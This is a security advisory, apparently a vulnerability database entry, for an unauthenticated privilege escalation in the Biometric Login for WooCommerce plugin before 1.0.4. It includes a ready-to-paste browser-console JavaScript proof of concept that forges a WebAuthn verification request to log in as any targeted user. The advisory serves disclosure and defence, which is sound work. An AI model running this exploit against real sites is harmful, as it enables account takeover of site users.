Biometric Login for WooCommerce < 1.0.4 – Unauthenticated Privilege Escalation

Description

The plugin does not validate that a user's WebAuthn authentication request succeeded before sending them authentication cookies, making it possible for unauthenticated attackers to take over any accounts having WebAuthn credentials set up on affected sites.

Proof of Concept

While on the site (not logged in!) paste the following in your browser's console. Be sure to change 'TARGET_EMAIL@DOMAIN.TLD' with the email address of the account you're targeting, and that this account has WebAuthn enabled.

const id = (await (await fetch('/wp-admin/admin-ajax.php?action=fme_wbl_login_using_biometric&user_email=TARGET_EMAIL@DOMAIN.TLD')).json()).publicKey.allowCredentials[0].id.split('?')[3];fetch('/wp-admin/admin-ajax.php?action=fme_wbl_verify_using_biometric&user_name=TARGET_EMAIL@DOMAIN.TLD&auth_data='+JSON.stringify({clientDataJSON:"e30=",authenticatorData:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",id}))

After refreshing the page, you'll notice you're now logged-in as that user.